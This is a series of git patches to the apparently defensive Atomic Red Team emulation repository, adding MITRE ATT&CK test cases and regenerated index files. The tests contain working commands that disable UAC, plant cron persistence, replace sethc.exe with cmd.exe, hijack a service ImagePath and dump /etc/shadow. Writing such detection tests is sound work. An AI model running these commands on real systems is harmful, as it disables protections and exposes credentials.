From 83b21a948773c86a9b62a826af2a11b58cf18463 Mon Sep 17 00:00:00 2001 From: P4T12ICK Date: Fri, 20 Nov 2020 17:17:23 +0100 Subject: [PATCH 01/13] atomic for disable UAC (#1289) Co-authored-by: P4T12ICK --- atomics/T1548.002/T1548.002.yaml | 18 ++++++++++++++++-- 1 file changed, 16 insertions(+), 2 deletions(-) diff --git a/atomics/T1548.002/T1548.002.yaml b/atomics/T1548.002/T1548.002.yaml index 0154e2c8..5186a236 100644 --- a/atomics/T1548.002/T1548.002.yaml +++ b/atomics/T1548.002/T1548.002.yaml @@ -128,7 +128,7 @@ atomic_tests: - name: Bypass UAC using sdclt DelegateExecute auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7 description: | - Bypasses User Account Control using a fileless method, registry only. + Bypasses User Account Control using a fileless method, registry only. Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass) Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1) @@ -147,4 +147,18 @@ atomic_tests: Start-Sleep -s 3 cleanup_command: | Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore - name: powershell \ No newline at end of file + name: powershell +- name: Disable UAC using reg.exe + auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 + description: | + Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key + HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0 + supported_platforms: + - windows + executor: + command: | + reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f + cleanup_command: | + reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f + name: command_prompt + elevation_required: true From 52f440e80a122e93eea6ef587f8621a59ce5f07e Mon Sep 17 00:00:00 2001 From: zgdatadoghq <46688288+zgdatadoghq@users.noreply.github.com> Date: Mon, 23 Nov 2020 16:11:53 -0500 Subject: [PATCH 02/13] Expand cronjob tests - Expand to cover all cron subfolders - Add test to cover /var/spool/cron/crontabs/ folder --- atomics/T1053.003/T1053.003.yaml | 35 ++++++++++++++++++++++++++++++-- 1 file changed, 33 insertions(+), 2 deletions(-) diff --git a/atomics/T1053.003/T1053.003.yaml b/atomics/T1053.003/T1053.003.yaml index 3ff12d0b..c6f92aee 100644 --- a/atomics/T1053.003/T1053.003.yaml +++ b/atomics/T1053.003/T1053.003.yaml @@ -30,10 +30,10 @@ atomic_tests: cleanup_command: | crontab /tmp/notevil -- name: Cron - Add script to cron folder +- name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: | - This test adds a script to a cron folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. + This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. supported_platforms: - macos @@ -54,5 +54,36 @@ atomic_tests: name: bash command: | echo "#{command}" > /etc/cron.daily/#{cron_script_name} + echo "#{command}" > /etc/cron.hourly/#{cron_script_name} + echo "#{command}" > /etc/cron.monthly/#{cron_script_name} + echo "#{command}" > /etc/cron.weekly/#{cron_script_name} cleanup_command: | rm /etc/cron.daily/#{cron_script_name} + rm /etc/cron.hourly/#{cron_script_name} + rm /etc/cron.monthly/#{cron_script_name} + rm /etc/cron.weekly/#{cron_script_name} + +- name: Cron - Add script to /var/spool/cron/crontabs/ folder + auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 + description: | + This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. + supported_platforms: + - linux + + input_arguments: + command: + description: Command to execute + type: string + default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log + cron_script_name: + description: Name of file to store in /var/spool/cron/crontabs folder + type: string + default: persistevil + + executor: + elevation_required: true + name: bash + command: | + echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} + cleanup_command: | + rm /var/spool/cron/crontabs/#{cron_script_name} From 164da2cfa0e94a5b47ea2500281f83f55eb63ef1 Mon Sep 17 00:00:00 2001 From: tlor89 <60741301+tlor89@users.noreply.github.com> Date: Fri, 27 Nov 2020 14:55:37 -0600 Subject: [PATCH 03/13] T1133 (#1295) Co-authored-by: Toua Lor --- atomics/T1133/T1133.yaml | 47 +++++++++ atomics/T1133/src/list of vpn extension.txt | 110 ++++++++++++++++++++ 2 files changed, 157 insertions(+) create mode 100644 atomics/T1133/T1133.yaml create mode 100644 atomics/T1133/src/list of vpn extension.txt diff --git a/atomics/T1133/T1133.yaml b/atomics/T1133/T1133.yaml new file mode 100644 index 00000000..aa5b5012 --- /dev/null +++ b/atomics/T1133/T1133.yaml @@ -0,0 +1,47 @@ +--- +attack_technique: T1133 +display_name: External Remote Services + +atomic_tests: +- name: Running Chrome VPN Extensions via the Registry 2 vpn extension + description: | + Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list + + supported_platforms: + - windows + + input_arguments: + chrome_url: + description: chrome installer download URL + type: url + default: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe + extension_id: + description: chrome extension id + type: String + default: | + "fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" + + dependency_executor_name: powershell # (optional) The executor for the prereq commands, defaults to the same executor used by the attack commands + dependencies: # (optional) + - description: | + chrome must be installed + prereq_command: 'if (cmd /c "chrome 2>nul") {exit 0} else {exit 1}' + get_prereq_command: | # commands to meet this prerequisite or a message describing how to meet this prereq + Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.exe #{chrome_url} + Start-Process $env:temp\ChromeStandaloneSetup64.exe /S + + executor: + name: powershell + elevation_required: true + command: | # these are the actaul attack commands, at least one command must be provided + $extList = #{extension_id} + foreach ($extension in $extList) { + New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force + New-ItemProperty -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -Name "update_url" -Value "https://clients2.google.com/service/update2/crx" -PropertyType "String" -Force} + Start-Process -FilePath "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" + Start-Sleep -Seconds 30 + Stop-Process -Name "chrome" + cleanup_command: | # you can remove the cleanup_command section if there are no cleanup commands + $extList = #{extension_id} + foreach ($extension in $extList) { + Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -ErrorAction Ignore} \ No newline at end of file diff --git a/atomics/T1133/src/list of vpn extension.txt b/atomics/T1133/src/list of vpn extension.txt new file mode 100644 index 00000000..64c34497 --- /dev/null +++ b/atomics/T1133/src/list of vpn extension.txt @@ -0,0 +1,110 @@ +ZenMate VPN - fdcgdnkidjaadafnichfpabhfomcebme +1clickVPN - fcfhplploccackoneaefokcmbjfbkenj +Touch VPN - bihmplhobchoageeokmgbdihknkjbknd +Hola Free VPN - gkojfkhlekighikafcpjkiklfbnlmeio +Astar VPN - jajilbjjinjmgcibalaakngmkilboobh +VPN Free - gjknjjomckknofjidppipffbpoekiipm +Earth VPN - nabbmpekekjknlbkgpodfndbodhijjem +DotVPN - kpiecbcckbofpmkkkdibbllpinceiihk +Hotspot Shield Free VPN - nlbejmccbhkncgokjcmghpfloaajcffj +Browsec VPN - omghfjlpggmjjaagoclmmobgdodcjboh +VPN-free.pro - bibjcjfmgapbfoljiojpipaooddpkpai +VPN Unlimited Free - mpcaainmfjjigeicjnlkdfajbioopjko +PP VPN - jljopmgdobloagejpohpldgkiellmfnc +IP Unblock - lochiccbgeohimldjooaakjllnafhaid +Surf VPN - nhnfcgpcbfclhfafjlooihdfghaeinfc +iNinja VPN - ookhnhpkphagefgdiemllfajmkdkcaim +Daily VPN - namfblliamklmeodpcelkokjbffgmeoo +Hoxx VPN Proxy - nbcojefnccbanplpoffopkoepjmhgdgh +Free VPN - majdfhpaihoncoakbjgbdhglocklcgno +VPN PROXY MASTER - lnfdmdhmfbimhhpaeocncdlhiodoblbd +Urban Free VPN - eppiocemhmnlbhjplcgkofciiegomcon +SaferVPN Proxy - cocfojppfigjeefejbpfmedgjbpchcng +VPN Professional - foiopecknacmiihiocgdjgbjokkpkohc +AdGuard VPN - hhdobjgopfphlmjbmnpglhfcgppchgje +Free VPN - jgbaghohigdbgbolncodkdlpenhcmcge +Free One Touch VPN - inligpkjkhbpifecbdjhmdpcfhnlelja +Unlimited VPN & Proxy by ibVPN - higioemojdadgdbhbbbkfbebbdlfjbip +RusVPN - hipncndjamdcmphkgngojegjblibadbe +Azino VPN - iolonopooapdagdemdoaihahlfkncfgg +Pron VPN - nhfjkakglbnnpkpldhjmpmmfefifedcj +Free Residential VPN - jpgljfpmoofbmlieejglhonfofmahini +ExpressVPN - fgddmllnllkalaagkghckoinaemmogpe +Hotspot Shield Elite VPN Proxy - ejkaocphofnobjdedneohbbiilggdlbi +Hide My IP VPN - keodbianoliadkoelloecbhllnpiocoi +Tunnello VPN - hoapmlpnmpaehilehggglehfdlnoegck +HMA VPN Proxy Unblocker - poeojclicodamonabcabmapamjkkmnnk +Free Avira Phantom VPN - dfkdflfgjdajbhocmfjolpjbebdkcjog +Hola VPN - kcdahmgmaagjhocpipbodaokikjkampi +Free VPN for Chrome - klnkiajpmpkkkgpgbogmcgfjhdoljacg +Hub VPN - lneaocagcijjdpkcabeanfpdbmapcjjg +Free Proxy VPN - pgfpignfckbloagkfnamnolkeaecfgfh +Private Internet Access - jplnlifepflhkbkgonidnobkakhmpnmh +Turbo VPN for PC - jliodmnojccaloajphkingdnpljdhdok +Windscribe - hnmpcagpplmpfojmgmnngilcnanddlhb +CyberGhost VPN - ffbkglfijbcbgblgflchnbphjdllaogb +VPN.AC - kcndmbbelllkmioekdagahekgimemejo +Browser VPN - jdgilggpfmjpbodmhndmhojklgfdlhob +DEEPRISM VPN - bihhflimonbpcfagfadcnbbdngpopnjb +My Browser Vpn - ppajinakbfocjfnijggfndbdmjggcmde +SetupVPN - oofgbpoabipfcfjapgnbbjjaenockbdp +Wachee VPN - bhnhkdgoefpmekcgnccpnhjfdgicfebm +Thunder Proxy - knmmpciebaoojcpjjoeonlcjacjopcpf +Free Proxy VPN - dhadilbmmjiooceioladdphemaliiobo +FastestVPN Proxy - jedieiamjmoflcknjdjhpieklepfglin +WorkingVPN - mhngpdlhojliikfknhfaglpnddniijfh +TunnelBear VPN - omdakjcmkglenbhjadbccaookpfjihpa +BelkaVPN - npgimkapccfidfkfoklhpkgmhgfejhbj +VPN Master - akeehkgglkmpapdnanoochpfmeghfdln +Unblock Websites - gbmdmipapolaohpinhblmcnpmmlgfgje +Lethean Proxy VPN - aigmfoeogfnljhnofglledbhhfegannp +Whoer VPN - cgojmfochfikphincbhokimmmjenhhgk +Best VPN USA - ficajfeojakddincjafebjmfiefcmanc +FREE VPN DEWELOPMENT - ifnaibldjfdmaipaddffmgcmekjhiloa +apkfold free vpn - jbnmpdkcfkochpanomnkhnafobppmccn +Soul VPN - apcfdffemoinopelidncddjbhkiblecc +DotVPN - mjolnodfokkkaichkcjipfgblbfgojpa +rderzh VPN Proxy - oifjbnnafapeiknapihcmpeodaeblbkn +Red Panda VPN - plpmggfglncceinmilojdkiijhmajkjh +Ultrareach VPN - mjnbclmflcpookeapghfhapeffmpodij +FastStunnel VPN - bblcccknbdbplgmdjnnikffefhdlobhp +VirtualShield VPN - aojlhgbkmkahabcmcpifbolnoichfeep +Adblock Office VPN Proxy Server - lcmammnjlbmlbcaniggmlejfjpjagiia +Guru VPN & Proxy - knajdeaocbpmfghhmijicidfcmdgbdpm +Malus VPN - bdlcnpceagnkjnjlbbbcepohejbheilk +Muscle VPN - edknjdjielmpdlnllkdmaghlbpnmjmgb +Push VPN - eidnihaadmmancegllknfbliaijfmkgo +Gom VPN - ckiahbcmlmkpfiijecbpflfahoimklke +Free Fast VPN - macdlemfnignjhclfcfichcdhiomgjjb +BullVPN - chioafkonnhbpajpengbalkececleldf +HideAll VPN - amnoibeflfphhplmckdbiajkjaoomgnj +ProxyFlow - llbhddikeonkpbhpncnhialfbpnilcnc +Cloud VPN - pcienlhnoficegnepejpfiklggkioccm +sVPN - iocnglnmfkgfedpcemdflhkchokkfeii +Social VPN - igahhbkcppaollcjeaaoapkijbnphfhb +Trellonet Trellonet - njpmifchgidinihmijhcfpbdmglecdlb +WindmillVPN - ggackgngljinccllcmbgnpgpllcjepgc +IPBurger Proxy & VPN - kchocjcihdgkoplngjemhpplmmloanja +Veee - bnijmipndnicefcdbhgcjoognndbgkep +Anonymous Proxy Vpn Browser - lklekjodgannjcccdlbicoamibgbdnmi +Hideman VPN - dbdbnchagbkhknegmhgikkleoogjcfge +Fornex VPN - egblhcjfjmbjajhjhpmnlekffgaemgfh +WeVPN - ehbhfpfdkmhcpaehaooegfdflljcnfec +VPNMatic - bkkgdjpomdnfemhhkalfkogckjdkcjkg +Urban Shield - almalgbpmcfpdaopimbdchdliminoign +Prime VPN - akkbkhnikoeojlhiiomohpdnkhbkhieh +westwind - gbfgfbopcfokdpkdigfmoeaajfmpkbnh +Upnet - bniikohfmajhdcffljgfeiklcbgffppl +uVPN - lejgfmmlngaigdmmikblappdafcmkndb +Nucleus VPN - ffhhkmlgedgcliajaedapkdfigdobcif +Touch VPN - bihmplhobchoageeokmgbdihknkjbknd +FoxyProxy Standard - gcknhkkoolaabfmlnjonogaaifnjlfnp +GeoProxy - pooljnboifbodgifngpppfklhifechoe +NordVPN - fjoaledfpmneenckfbpdfhkmimnjocfa +ProxFlow - aakchaleigkohafkfjfjbblobjifikek +Proxy SwitchySharp - dpplabbmogkhghncfbfdeeokoefdjegm +Proxy SwitchyOmega - padekgcemlokbadohgkifijomclgjgif +PureVPN - bfidboloedlamgdmenmlbipfnccokknp +RusVPN - hipncndjamdcmphkgngojegjblibadbe +SaferVPN - cocfojppfigjeefejbpfmedgjbpchcng +TunnelBear VPN - omdakjcmkglenbhjadbccaookpfjihpa \ No newline at end of file From 9ec5d7dd9afbd875a706d1339cd631c4bbff8991 Mon Sep 17 00:00:00 2001 From: Brian Thacker Date: Fri, 27 Nov 2020 14:57:42 -0600 Subject: [PATCH 04/13] Update T1218 Test 5 (#1296) default path contains a space and the command needs to be surrounded by quotes. Co-authored-by: Carrie Roberts --- atomics/T1218/T1218.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml index 0b10961a..1c1e297d 100644 --- a/atomics/T1218/T1218.yaml +++ b/atomics/T1218/T1218.yaml @@ -122,4 +122,4 @@ atomic_tests: name: command_prompt elevation_required: false command: | - #{microsoft_wordpath}\protocolhandler.exe "ms-word:nft|u|#{remote_url}" + "#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}" From 91ea164b8e4d34bf0e0f7b1967993c7fdd5bc28a Mon Sep 17 00:00:00 2001 From: P4T12ICK Date: Fri, 27 Nov 2020 22:13:05 +0100 Subject: [PATCH 05/13] new atomic (#1298) Co-authored-by: P4T12ICK Co-authored-by: Carrie Roberts --- atomics/T1546.008/T1546.008.yaml | 19 +++++++++++++++++-- 1 file changed, 17 insertions(+), 2 deletions(-) diff --git a/atomics/T1546.008/T1546.008.yaml b/atomics/T1546.008/T1546.008.yaml index 4ddefabb..fda9c6b0 100644 --- a/atomics/T1546.008/T1546.008.yaml +++ b/atomics/T1546.008/T1546.008.yaml @@ -25,7 +25,7 @@ atomic_tests: $input_table = "#{parent_list}".split(",") $Name = "Debugger" $Value = "#{attached_process}" - Foreach ($item in $input_table){ + Foreach ($item in $input_table){ $item = $item.trim() $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" IF(!(Test-Path $registryPath)) @@ -47,4 +47,19 @@ atomic_tests: } name: powershell elevation_required: true - +- name: Replace binary of sticky keys + auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 + description: | + Replace sticky keys binary (sethc.exe) with cmd.exe + supported_platforms: + - windows + executor: + command: | + copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe + takeown /F C:\Windows\System32\sethc.exe /A + icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t + copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe + cleanup_command: | + copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe + name: command_prompt + elevation_required: true From d5e64a6d879e09d08bc10b679cf4305a2451810d Mon Sep 17 00:00:00 2001 From: P4T12ICK Date: Fri, 27 Nov 2020 22:15:29 +0100 Subject: [PATCH 06/13] New atomic t1574 011 (#1301) * new atomic * new atomic * new atomic * new atomic Co-authored-by: P4T12ICK Co-authored-by: Carrie Roberts --- atomics/T1574.011/T1574.011.yaml | 37 ++++++++++++++++++++++++++++++-- 1 file changed, 35 insertions(+), 2 deletions(-) diff --git a/atomics/T1574.011/T1574.011.yaml b/atomics/T1574.011/T1574.011.yaml index 1699ec27..2d13e804 100644 --- a/atomics/T1574.011/T1574.011.yaml +++ b/atomics/T1574.011/T1574.011.yaml @@ -4,7 +4,7 @@ atomic_tests: - name: Service Registry Permissions Weakness auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a description: | - Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. + Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" supported_platforms: - windows @@ -17,4 +17,37 @@ atomic_tests: command: | get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL - name: powershell \ No newline at end of file + name: powershell +- name: Service ImagePath Change with reg.exe + auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827 + description: | + Change Service registry ImagePath of a bengin service to a malicious file + supported_platforms: + - windows + input_arguments: + weak_service_name: + description: weak service name + type: String + default: calcservice + weak_service_path: + description: weak service path + type: String + default: '%windir%\system32\win32calc.exe' + malicious_service_path: + description: malicious service path + type: String + default: '%windir%\system32\cmd.exe' + dependency_executor_name: powershell + dependencies: + - description: | + The service must exist (#{weak_service_name}) + prereq_command: | + if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} + get_prereq_command: | + sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" + executor: + command: | + reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" + cleanup_command: | + sc.exe delete #{weak_service_name} + name: command_prompt From 2b4c7c0112f1071947ea4c9e3aea2de18376c8ee Mon Sep 17 00:00:00 2001 From: zgdatadoghq <46688288+zgdatadoghq@users.noreply.github.com> Date: Mon, 30 Nov 2020 11:12:21 -0500 Subject: [PATCH 07/13] Add two T1003.008 tests (#1299) * Create T1003.008.yaml * Create T1003.008.md * Update T1003.008.md Co-authored-by: Carl <57147304+rc-grey@users.noreply.github.com> --- atomics/T1003.008/T1003.008.md | 80 ++++++++++++++++++++++++++++++++ atomics/T1003.008/T1003.008.yaml | 40 ++++++++++++++++ 2 files changed, 120 insertions(+) create mode 100644 atomics/T1003.008/T1003.008.md create mode 100644 atomics/T1003.008/T1003.008.yaml diff --git a/atomics/T1003.008/T1003.008.md b/atomics/T1003.008/T1003.008.md new file mode 100644 index 00000000..c5d38f78 --- /dev/null +++ b/atomics/T1003.008/T1003.008.md @@ -0,0 +1,80 @@ +# T1003.008 - /etc/passwd and /etc/shadow +## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1003/008) +
Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd and /etc/shadow to store user account information including password hashes in /etc/shadow. By default, /etc/shadow is only readable by the root user.(Citation: Linux Password and Shadow File Formats) + +The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) # /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db +
+ +## Atomic Tests + +- [Atomic Test #1 - Access /etc/shadow (Local)](#atomic-test-1---access-etcshadow-local) + + +
+ +## Atomic Test #1 - Access /etc/shadow (Local) +/etc/shadow file is accessed in Linux environments + +**Supported Platforms:** Linux + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt| + + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) + + +```bash +sudo cat /etc/shadow > #{output_file} +cat #{output_file} +``` + +#### Cleanup Commands: +```bash +rm -f #{output_file} +``` + + + + + +
+
+ +## Atomic Test #2 - Access /etc/passwd (Local) +/etc/passwd file is accessed in Linux environments + +**Supported Platforms:** Linux + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt| + + +#### Attack Commands: Run with `sh`! + + +```sh +cat /etc/passwd > #{output_file} +cat #{output_file} +``` + +#### Cleanup Commands: +```sh +rm -f #{output_file} +``` + + + + + +
diff --git a/atomics/T1003.008/T1003.008.yaml b/atomics/T1003.008/T1003.008.yaml new file mode 100644 index 00000000..68ddee87 --- /dev/null +++ b/atomics/T1003.008/T1003.008.yaml @@ -0,0 +1,40 @@ +attack_technique: T1003.008 +display_name: 'OS Credential Dumping: /etc/passwd and /etc/shadow' +atomic_tests: +- name: Access /etc/shadow (Local) + auto_generated_guid: 3723ab77-c546-403c-8fb4-bb577033b235 + description: | + /etc/shadow file is accessed in Linux environments + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed + type: Path + default: /tmp/T1003.008.txt + executor: + command: | + sudo cat /etc/shadow > #{output_file} + cat #{output_file} + cleanup_command: | + rm -f #{output_file} + name: bash + elevation_required: true +- name: Access /etc/passwd (Local) + auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d + description: | + /etc/passwd file is accessed in Linux environments + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed + type: Path + default: /tmp/T1003.008.txt + executor: + command: | + cat /etc/passwd > #{output_file} + cat #{output_file} + cleanup_command: | + rm -f #{output_file} + name: sh From e9cb3c2f599c949c9540cae0d17e839891409061 Mon Sep 17 00:00:00 2001 From: Matt Graeber <60448025+mgraeber-rc@users.noreply.github.com> Date: Mon, 30 Nov 2020 11:18:32 -0500 Subject: [PATCH 08/13] Update README.md (#1302) * Update README.md Updating execution frameworks link. * Generate docs from job=validate_atomics_generate_docs branch=mgraeber-rc-patch-1 * Generate docs from job=validate_atomics_generate_docs branch=mgraeber-rc-patch-1 Co-authored-by: CircleCI Atomic Red Team doc generator Co-authored-by: Michael Haag --- README.md | 2 +- .../art-navigator-layer-linux.json | 2 +- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 24 +- atomics/Indexes/Indexes-CSV/linux-index.csv | 11 +- atomics/Indexes/Indexes-CSV/macos-index.csv | 6 +- atomics/Indexes/Indexes-CSV/windows-index.csv | 13 +- atomics/Indexes/Indexes-Markdown/index.md | 30 +- .../Indexes/Indexes-Markdown/linux-index.md | 13 +- .../Indexes/Indexes-Markdown/macos-index.md | 6 +- .../Indexes/Indexes-Markdown/windows-index.md | 17 +- atomics/Indexes/Matrices/linux-matrix.md | 2 +- atomics/Indexes/Matrices/matrix.md | 6 +- atomics/Indexes/Matrices/windows-matrix.md | 4 +- atomics/Indexes/index.yaml | 598 ++++++++++++++++-- atomics/T1003.008/T1003.008.md | 12 +- atomics/T1016/T1016.md | 31 + atomics/T1016/T1016.yaml | 1 + atomics/T1053.003/T1053.003.md | 48 +- atomics/T1069.002/T1069.002.md | 1 + atomics/T1133/T1133.md | 66 ++ atomics/T1133/T1133.yaml | 1 + atomics/T1218/T1218.md | 2 +- atomics/T1222.001/T1222.001.md | 58 +- atomics/T1546.008/T1546.008.md | 35 +- atomics/T1548.002/T1548.002.md | 33 +- atomics/T1574.011/T1574.011.md | 51 +- atomics/used_guids.txt | 9 + 29 files changed, 979 insertions(+), 107 deletions(-) create mode 100644 atomics/T1133/T1133.md diff --git a/README.md b/README.md index 51788ec0..7c0d1a5e 100644 --- a/README.md +++ b/README.md @@ -39,7 +39,7 @@ Join the community on Slack at [https://atomicredteam.slack.com](https://atomicr ## Getting Started * [Getting Started With Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/wiki/About-Atomic-Red-Team) -* Automated Test Execution with the [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/blob/master/execution-frameworks) +* Automated Test Execution with the [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/wiki/Executing-Atomic-Tests#execute-an-atomic-test-with-an-execution-framework) * Peruse the Complete list of Atomic Tests ([md](atomics/Indexes/Indexes-Markdown/index.md), [csv](atomics/Indexes/Indexes-CSV/index.csv)) and the [ATT&CK Matrix](atomics/Indexes/Matrices/matrix.md) - Windows [Matrix](atomics/Indexes/Matrices/windows-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/windows-index.md), [csv](atomics/Indexes/Indexes-CSV/windows-index.csv)) - MacOS [Matrix](atomics/Indexes/Matrices/macos-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/macos-index.md), [csv](atomics/Indexes/Indexes-CSV/macos-index.csv)) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index 0e6e94e2..67f28848 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json @@ -1 +1 @@ -{"version":"3.0","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techn